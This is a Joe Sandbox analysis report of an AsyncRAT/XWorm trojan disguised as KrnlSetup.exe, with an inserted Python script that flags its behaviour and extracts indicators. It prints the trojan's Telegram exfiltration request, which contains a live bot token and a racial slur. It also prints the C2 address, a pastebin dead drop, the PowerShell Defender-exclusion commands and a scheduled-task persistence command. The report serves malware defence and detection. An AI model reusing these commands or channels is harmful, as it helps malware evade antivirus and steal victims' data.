Source: global traffic | HTTP traffic detected: GET /bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzz HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 115.69.183.222 (this entry is listed 50 times in the report; the C2 host is addressed by IP, never resolved by name)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: powershell.exe, 00000009.00000002.2041628498.00000231C1B87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: KrnlSetup.exe, ntoskrnl.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000B.00000002.2242720831.0000019028D4D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: KrnlSetup.exe, ntoskrnl.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=59991
Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.2034848231.00000231C178C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: ntoskrnl.exe, 00000011.00000002.2474120647.0000000002631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/5FinF5Mf
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.KrnlSetup.exe.25e3da0.2.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen
Source: 0.2.KrnlSetup.exe.9f0000.0.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen
Source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, RemoteDesktop.cs | .Net Code: GetScreen

Operating System Destruction

Source: C:\Users\user\Desktop\KrnlSetup.exe | Process information set: 01 00 00 00
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process information set: 00 00 00 00

The two writes are the ProcessBreakOnTermination information class being set to 1 and later cleared back to 0. While the flag is 1 the process is marked critical, so terminating it (Task Manager, taskkill, an EDR kill action) bugchecks the machine with CRITICAL_PROCESS_DIED; this is the behaviour behind the "Protects its processes via BreakOnTermination flag" signature in the overview. Responders should clear the flag or suspend the process rather than kill it outright.

System Summary

Source: KrnlSetup.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\ntoskrnl.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B790814
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B789369
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B791FDA
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B781709
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B787342
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B786596
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B782461
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B781040
Source: C:\Users\user\Desktop\KrnlSetup.exe | Code function: 0_2_00007FFD9B7821C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B8330E9
Source: C:\ProgramData\ntoskrnl.exe | Code function: 15_2_00007FFD9B761709
Source: C:\ProgramData\ntoskrnl.exe | Code function: 15_2_00007FFD9B761028
Source: C:\ProgramData\ntoskrnl.exe | Code function: 15_2_00007FFD9B7621C1
Source: C:\ProgramData\ntoskrnl.exe | Code function: 16_2_00007FFD9B761709
Source: C:\ProgramData\ntoskrnl.exe | Code function: 16_2_00007FFD9B761028
Source: C:\ProgramData\ntoskrnl.exe | Code function: 16_2_00007FFD9B7621C1
Source: C:\ProgramData\ntoskrnl.exe | Code function: 17_2_00007FFD9B781709
Source: C:\ProgramData\ntoskrnl.exe | Code function: 17_2_00007FFD9B781028
Source: C:\ProgramData\ntoskrnl.exe | Code function: 17_2_00007FFD9B7821C1
Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs KrnlSetup.exe
Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000025CD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs KrnlSetup.exe
Source: KrnlSetup.exe, 00000000.00000002.2607307825.0000000000733000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameschtasks.exe.muij% vs KrnlSetup.exe
Source: KrnlSetup.exe, 00000000.00000002.2613437985.00000000009F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRemoteDesktop.dll< vs KrnlSetup.exe
Source: KrnlSetup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: KrnlSetup.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\ntoskrnl.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: KrnlSetup.exe, OKwK7LhbT17LhFoV8nXoqDfY9C.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetup.exe, ZErofTOG7QyG2YqbzUeXCBXVgf.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetup.exe, ZErofTOG7QyG2YqbzUeXCBXVgf.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: ntoskrnl.exe.0.dr, OKwK7LhbT17LhFoV8nXoqDfY9C.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: ntoskrnl.exe.0.dr, ZErofTOG7QyG2YqbzUeXCBXVgf.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: ntoskrnl.exe.0.dr, ZErofTOG7QyG2YqbzUeXCBXVgf.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KrnlSetup.exe.25e3da0.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KrnlSetup.exe.25e3da0.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KrnlSetup.exe.9f0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KrnlSetup.exe.9f0000.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: KrnlSetup.exe, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.cs | Base64 encoded string: 'Ilvs9JyJof25dROWijKfluW5VD5GvPhQ++l5sJUhwY36aZ7t+8zWqU9zDDlLz7P3'
Source: ntoskrnl.exe.0.dr, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.cs | Base64 encoded string: 'Ilvs9JyJof25dROWijKfluW5VD5GvPhQ++l5sJUhwY36aZ7t+8zWqU9zDDlLz7P3'
Source: ntoskrnl.exe.0.dr, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: ntoskrnl.exe.0.dr, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: KrnlSetup.exe, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: KrnlSetup.exe, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@28/24@3/4
Source: C:\Users\user\Desktop\KrnlSetup.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\ProgramData\ntoskrnl.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Users\user\Desktop\KrnlSetup.exe | Mutant created: \Sessions\1\BaseNamedObjects\wS095JlWNJZxtKC9
Source: C:\Users\user\Desktop\KrnlSetup.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
Source: KrnlSetup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KrnlSetup.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\KrnlSetup.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\KrnlSetup.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: KrnlSetup.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\KrnlSetup.exe | File read: C:\Users\user\Desktop\KrnlSetup.exe
Source: unknown | Process created: C:\Users\user\Desktop\KrnlSetup.exe "C:\Users\user\Desktop\KrnlSetup.exe"
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\ProgramData\ntoskrnl.exe C:\ProgramData\ntoskrnl.exe
Source: unknown | Process created: C:\ProgramData\ntoskrnl.exe "C:\ProgramData\ntoskrnl.exe"
Source: unknown | Process created: C:\ProgramData\ntoskrnl.exe "C:\ProgramData\ntoskrnl.exe"
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KrnlSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
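The process-creation rows above show the sample's whole evasion-and-persistence sequence: four PowerShell launches with -ExecutionPolicy Bypass that add Defender path and process exclusions for both the original file and the dropped copy, a scheduled task named "ntoskrnl" that relaunches C:\ProgramData\ntoskrnl.exe every minute with the highest run level, and a binary carrying a Windows kernel image name running from ProgramData. The following Python script is an added example and not part of the Joe Sandbox report: it applies three host-level checks to those command lines and pulls the Telegram bot token, chat id and pastebin dead-drop id out of the memory strings listed earlier on the page. The event records and strings are constructed from the rows printed in the report; the rule names, the list of protected image names and the five-minute "watchdog" threshold are this example's own assumptions.

```python
"""Triage of the process-creation rows and C2 strings listed above.

Added example, not part of the Joe Sandbox report. The event records and memory
strings are constructed from the rows printed in the report; the rule names and
the short-interval threshold are this example's own choices.
"""
import re
from dataclasses import dataclass

# Paths exactly as they appear in the report's process-creation rows.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
SAMPLE = r"C:\Users\user\Desktop\KrnlSetup.exe"
DROPPED = r"C:\ProgramData\ntoskrnl.exe"

# (image path, command line) pairs constructed from the report; the last one is a
# benign control that an administrator might type by hand.
EVENTS = [
    (PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \'{SAMPLE}\''),
    (PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \'KrnlSetup.exe\''),
    (PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath \'{DROPPED}\''),
    (PS, f'"{PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \'ntoskrnl.exe\''),
    (SCHTASKS, f'"{SCHTASKS}" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "{DROPPED}"'),
    (DROPPED, f'"{DROPPED}"'),
    (r"C:\Windows\System32\cmd.exe", r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""'),
    (PS, f'"{PS}" Get-MpPreference'),
]

# Strings from the "String found in binary or memory" rows; the Telegram URL is
# reproduced as the report prints it (the chat_id is cut off there).
MEMORY_STRINGS = [
    "https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=59991",
    "https://pastebin.com/raw/5FinF5Mf",
    "https://contoso.com/License",  # PowerShell module boilerplate, not C2
]

# Image names that only belong in a Windows system directory (assumption of this
# example; extend it to the names your environment cares about).
SYSTEM_IMAGE_NAMES = {"ntoskrnl.exe", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SHORT_INTERVAL_MINUTES = 5  # tasks firing this often are almost always a watchdog

EXCLUSION_RE = re.compile(
    r"\badd-mppreference\b.*?-exclusion(path|process|extension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)
# PowerShell accepts any unambiguous prefix of -ExecutionPolicy, so match the common ones.
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|xec|x|p)\s+bypass\b", re.I)
SCHTASKS_CREATE_RE = re.compile(r"schtasks(?:\.exe)?\"?\s+/create\b", re.I)
SC_RE = re.compile(r"/sc\s+(\w+)(?:\s+/mo\s+(\d+))?", re.I)
RL_RE = re.compile(r"/rl\s+highest\b", re.I)
TN_RE = re.compile(r'/tn\s+"([^"]+)"', re.I)
TR_RE = re.compile(r'/tr\s+"([^"]+)"', re.I)
TELEGRAM_RE = re.compile(r"https://api\.telegram\.org/bot(\d+:[\w-]+)/(\w+)(?:\?chat_id=(\d+))?")
PASTEBIN_RE = re.compile(r"https://pastebin\.com/raw/(\w+)")


@dataclass
class Finding:
    rule: str
    detail: str


def system_image_location_anomaly(image: str) -> bool:
    """True when a Windows system image name runs from outside a system directory."""
    low = image.lower()
    return low.rsplit("\\", 1)[-1] in SYSTEM_IMAGE_NAMES and not low.startswith(SYSTEM_DIRS)


def analyze(image: str, cmdline: str) -> list:
    """Apply the three host-level checks to one process-creation record."""
    findings = []
    m = EXCLUSION_RE.search(cmdline)
    if m:
        target = m.group(2) or m.group(3) or m.group(4)
        how = " via -ExecutionPolicy Bypass" if BYPASS_RE.search(cmdline) else ""
        findings.append(Finding("defender_exclusion_added", f"Exclusion{m.group(1)} {target}{how}"))
    if SCHTASKS_CREATE_RE.search(cmdline):
        sc, tn, tr = SC_RE.search(cmdline), TN_RE.search(cmdline), TR_RE.search(cmdline)
        every = int(sc.group(2) or 1) if sc else None
        watchdog = sc is not None and sc.group(1).lower() == "minute" and every <= SHORT_INTERVAL_MINUTES
        detail = (f"task {tn.group(1) if tn else '?'} runs {tr.group(1) if tr else '?'}"
                  f"{' every ' + str(every) + ' minute(s)' if watchdog else ''}"
                  f"{' at highest run level' if RL_RE.search(cmdline) else ''}")
        findings.append(Finding("scheduled_task_persistence", detail))
    if system_image_location_anomaly(image):
        findings.append(Finding("system_image_location_anomaly", f"{image} runs outside a system directory"))
    return findings


def triage(events) -> dict:
    """Map each command line to the names of the rules it triggered."""
    return {cmd: [f.rule for f in analyze(img, cmd)] for img, cmd in events}


def extract_c2_iocs(strings) -> dict:
    """Pull the Telegram bot token, chat id and pastebin dead-drop id out of memory strings."""
    iocs = {"telegram_bot_tokens": [], "telegram_chat_ids": [], "pastebin_pastes": []}
    for s in strings:
        for token, _method, chat_id in TELEGRAM_RE.findall(s):
            iocs["telegram_bot_tokens"].append(token)
            if chat_id:
                iocs["telegram_chat_ids"].append(chat_id)
        iocs["pastebin_pastes"].extend(PASTEBIN_RE.findall(s))
    return iocs


if __name__ == "__main__":
    for img, cmd in EVENTS:
        for f in analyze(img, cmd):
            print(f"[{f.rule}] {f.detail}")
    print(extract_c2_iocs(MEMORY_STRINGS))
```

The exclusion check keys on the Add-MpPreference cmdlet rather than on the literal powershell.exe path, because the same exclusion can be added from pwsh.exe or an encoded command (the overview's "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule covers that variant); the benign Get-MpPreference control produces no finding. The Telegram bot token is the more useful indicator of the two C2 channels: the pastebin paste can be rotated, but the token identifies the operator's bot to Telegram and can be reported for takedown.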
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\KrnlSetup.exe | Section loaded: urlmon.dll
